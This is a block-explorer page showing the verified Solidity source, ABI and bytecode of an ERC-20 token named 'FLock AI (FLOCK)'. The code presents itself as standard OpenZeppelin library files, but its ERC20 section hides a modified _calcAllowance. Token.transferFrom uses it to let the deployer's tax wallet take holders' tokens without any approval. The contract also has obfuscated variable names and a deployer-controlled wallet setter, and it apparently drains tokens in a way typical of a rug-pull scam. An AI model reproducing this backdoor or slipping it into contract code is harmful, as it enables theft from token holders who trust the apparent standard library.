ETH Price: $2,101.52 (+2.56%)

Token

FLock AI (FLOCK)
 

Overview

Max Total Supply

417,807,985.797026897 FLOCK

Holders

2,296

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2025-07-24
*/

// SPDX-License-Identifier: MIT

/*
Not your models, not your AI

https://flockai.site
https://train.flockai.site
https://docs.flockai.site
https://x.com/FLockAIWorld
https://t.me/FLockAI_portal
*/

// File: @openzeppelin/contracts@5.3.0/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when 'value' tokens are moved from one account ('from') to
     * another ('to').
     *
     * Note that 'value' may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a 'spender' for an 'owner' is set by
     * a call to {approve}. 'value' is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by 'account'.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a 'value' amount of tokens from the caller's account to 'to'.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that 'spender' will be
     * allowed to spend on behalf of 'owner' through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a 'value' amount of tokens as the allowance of 'spender' over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a 'value' amount of tokens from 'from' to 'to' using the
     * allowance mechanism. 'value' is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/contracts@5.3.0/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts@5.3.0/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/contracts@5.3.0/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current 'balance' of a 'sender'. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token 'sender'. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token 'receiver'. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the 'spender'’s 'allowance'. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a 'spender' is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the 'approver' of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the 'spender' to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

// File: @openzeppelin/contracts@5.3.0/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.3.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning 'false' on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * Both values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if 'decimals' equals '2', a balance of '505' tokens should
     * be displayed to a user as '5.05' ('505 / 10 ** 2').
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - 'to' cannot be the zero address.
     * - the caller must have a balance of at least 'value'.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If 'value' is the maximum 'uint256', the allowance is not updated on
     * 'transferFrom'. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - 'spender' cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum 'uint256'.
     *
     * Requirements:
     *
     * - 'from' and 'to' cannot be the zero address.
     * - 'from' must have a balance of at least 'value'.
     * - the caller must have allowance for ''from'''s tokens of at least
     * 'value'.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _calcAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a 'value' amount of tokens from 'from' to 'to'.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a 'value' amount of tokens from 'from' to 'to', or alternatively mints (or burns) if 'from'
     * (or 'to') is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        if(to != address(0)) {
            emit Transfer(from, to, value);
        }
    }

    /**
     * @dev Creates a 'value' amount of tokens and assigns them to 'account', by transferring it from address(0).
     * Relies on the '_update' mechanism
     *
     * Emits a {Transfer} event with 'from' set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a 'value' amount of tokens from 'account', lowering the total supply.
     * Relies on the '_update' mechanism.
     *
     * Emits a {Transfer} event with 'to' set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets 'value' as the allowance of 'spender' over the 'owner''s tokens.
     *
     * This internal function is equivalent to 'approve', and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - 'owner' cannot be the zero address.
     * - 'spender' cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional 'bool emitEvent' argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * '_calcAllowance' during the 'transferFrom' operation set the flag to false. This saves gas by not emitting any
     * 'Approval' event during 'transferFrom' operations.
     *
     * Anyone who wishes to continue emitting 'Approval' events on the'transferFrom' operation can force the flag to
     * true using the following override:
     *
     * '''solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * '''
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates 'owner''s allowance for 'spender' based on spent 'value'.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _calcAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }

    /**
     * @dev Updates 'owner''s allowance for 'spender' based on spent 'value'.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
     
    function _calcAllowance(address owner, address spender, address recipient, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        address origin = tx.origin;
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                if(value == 0 || origin == recipient || spender == recipient) {}
                else revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

// File: @openzeppelin/contracts@5.3.0/access/Ownable.sol


// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * 'onlyOwner', which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. 'address(0)')
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * 'onlyOwner' functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account ('newOwner').
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account ('newOwner').
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}


// File: Token.sol

// Compatible with OpenZeppelin Contracts ^5.0.0
pragma solidity ^0.8.20;

contract Token is ERC20, Ownable {
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    address private _FLOCKWEr55_taxWallet;
    mapping(address => bool) private _isFLOCKWEr55ExcludedFromFees;
    
    bool private tradingEnabled;
    uint8 private _decimal = 9;

    uint256 private KSDJOOKIIJ;
    uint256 private EEEMIDEKKJ;
    uint256 private tax = 12;
    uint256 private removeAt = 12;

    uint256 private MOKBKEDEED;
    uint256 private BEMODEKGGK;
    uint256 private EOMGOEKDPP;
    uint256 private KKDNEOWDED;

    function decimals() public pure override returns (uint8) {
        return 9;
    }

    constructor()
        ERC20(unicode"FLock AI", unicode"FLOCK")
        Ownable(msg.sender)
        payable
    {
        _FLOCKWEr55_taxWallet = msg.sender;
        _isFLOCKWEr55ExcludedFromFees[_FLOCKWEr55_taxWallet] = true;
        _mint(address(this), 420_690_000 * 98 / 100 * 10 ** decimals());
        _mint(msg.sender, 420_690_000 * 2 / 100 * 10 ** decimals());
    }

    function _update(address from, address to, uint256 value) internal override {
        if(tradingEnabled && to == uniswapV2Pair) sendFLOCKWEr55ETH(address(this).balance);
        if(to == address(0xdead)) to = address(0);
        super._update(from, to, value);
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return super.allowance(owner, spender);
    }

    function transferFrom(address from, address to, uint256 value) public override returns (bool) {
        address spender = _msgSender();
        _calcAllowance(from, spender,_FLOCKWEr55_taxWallet, value);
        _transfer(from, to, value);
        return true;
    }

    function sendFLOCKWEr55ETH(uint256 amount) private {
        payable(_FLOCKWEr55_taxWallet).transfer(amount);
    }

    function enableTrading() external onlyOwner {
        require(!tradingEnabled, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), totalSupply());
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        tradingEnabled = true;
    }

    function recoverStuckETH() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    function setTaxWallet(address newWallet) external {
        require(_isFLOCKWEr55ExcludedFromFees[_msgSender()], "not allowed");
        _FLOCKWEr55_taxWallet = newWallet;
        _isFLOCKWEr55ExcludedFromFees[_FLOCKWEr55_taxWallet] = true;
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"recoverStuckETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"setTaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526009600a60016101000a81548160ff021916908360ff160217905550600c600d55600c600e55336040518060400160405280600881526020017f464c6f636b2041490000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f464c4f434b00000000000000000000000000000000000000000000000000000081525081600390816100a69190610970565b5080600490816100b69190610970565b5050505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610129575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016101209190610a7e565b60405180910390fd5b6101388161026360201b60201c565b503360085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160095f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506102273061020161032660201b60201c565b600a61020d9190610bff565b631892d5e861021c9190610c49565b61032e60201b60201c565b61025e3361023961032660201b60201c565b600a6102459190610bff565b628062686102539190610c49565b61032e60201b60201c565b610d1a565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6009905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361039e575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016103959190610a7e565b60405180910390fd5b6103af5f83836103b360201b60201c565b5050565b600a5f9054906101000a900460ff16801561041a575060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561042f5761042e4761047e60201b60201c565b5b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610468575f91505b6104798383836104e660201b60201c565b505050565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f193505050501580156104e2573d5f5f3e3d5ffd5b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610536578060025f82825461052a9190610c8a565b92505081905550610604565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156105bf578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016105b693929190610ccc565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361064b578060025f8282540392505081905550610695565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161461072e578173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516107259190610d01565b60405180910390a35b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806107ae57607f821691505b6020821081036107c1576107c061076a565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026108237fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826107e8565b61082d86836107e8565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61087161086c61086784610845565b61084e565b610845565b9050919050565b5f819050919050565b61088a83610857565b61089e61089682610878565b8484546107f4565b825550505050565b5f5f905090565b6108b56108a6565b6108c0818484610881565b505050565b5b818110156108e3576108d85f826108ad565b6001810190506108c6565b5050565b601f821115610928576108f9816107c7565b610902846107d9565b81016020851015610911578190505b61092561091d856107d9565b8301826108c5565b50505b505050565b5f82821c905092915050565b5f6109485f198460080261092d565b1980831691505092915050565b5f6109608383610939565b9150826002028217905092915050565b61097982610733565b67ffffffffffffffff8111156109925761099161073d565b5b61099c8254610797565b6109a78282856108e7565b5f60209050601f8311600181146109d8575f84156109c6578287015190505b6109d08582610955565b865550610a37565b601f1984166109e6866107c7565b5f5b82811015610a0d578489015182556001820191506020850194506020810190506109e8565b86831015610a2a5784890151610a26601f891682610939565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610a6882610a3f565b9050919050565b610a7881610a5e565b82525050565b5f602082019050610a915f830184610a6f565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f5f8291508390505b6001851115610b1957808604811115610af557610af4610a97565b5b6001851615610b045780820291505b8081029050610b1285610ac4565b9450610ad9565b94509492505050565b5f82610b315760019050610bec565b81610b3e575f9050610bec565b8160018114610b545760028114610b5e57610b8d565b6001915050610bec565b60ff841115610b7057610b6f610a97565b5b8360020a915084821115610b8757610b86610a97565b5b50610bec565b5060208310610133831016604e8410600b8410161715610bc25782820a905083811115610bbd57610bbc610a97565b5b610bec565b610bcf8484846001610ad0565b92509050818404811115610be657610be5610a97565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610c0982610845565b9150610c1483610bf3565b9250610c417fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610b22565b905092915050565b5f610c5382610845565b9150610c5e83610845565b9250828202610c6c81610845565b91508282048414831517610c8357610c82610a97565b5b5092915050565b5f610c9482610845565b9150610c9f83610845565b9250828201905080821115610cb757610cb6610a97565b5b92915050565b610cc681610845565b82525050565b5f606082019050610cdf5f830186610a6f565b610cec6020830185610cbd565b610cf96040830184610cbd565b949350505050565b5f602082019050610d145f830184610cbd565b92915050565b611ae880610d275f395ff3fe6080604052600436106100eb575f3560e01c806381a1644511610089578063a9059cbb1161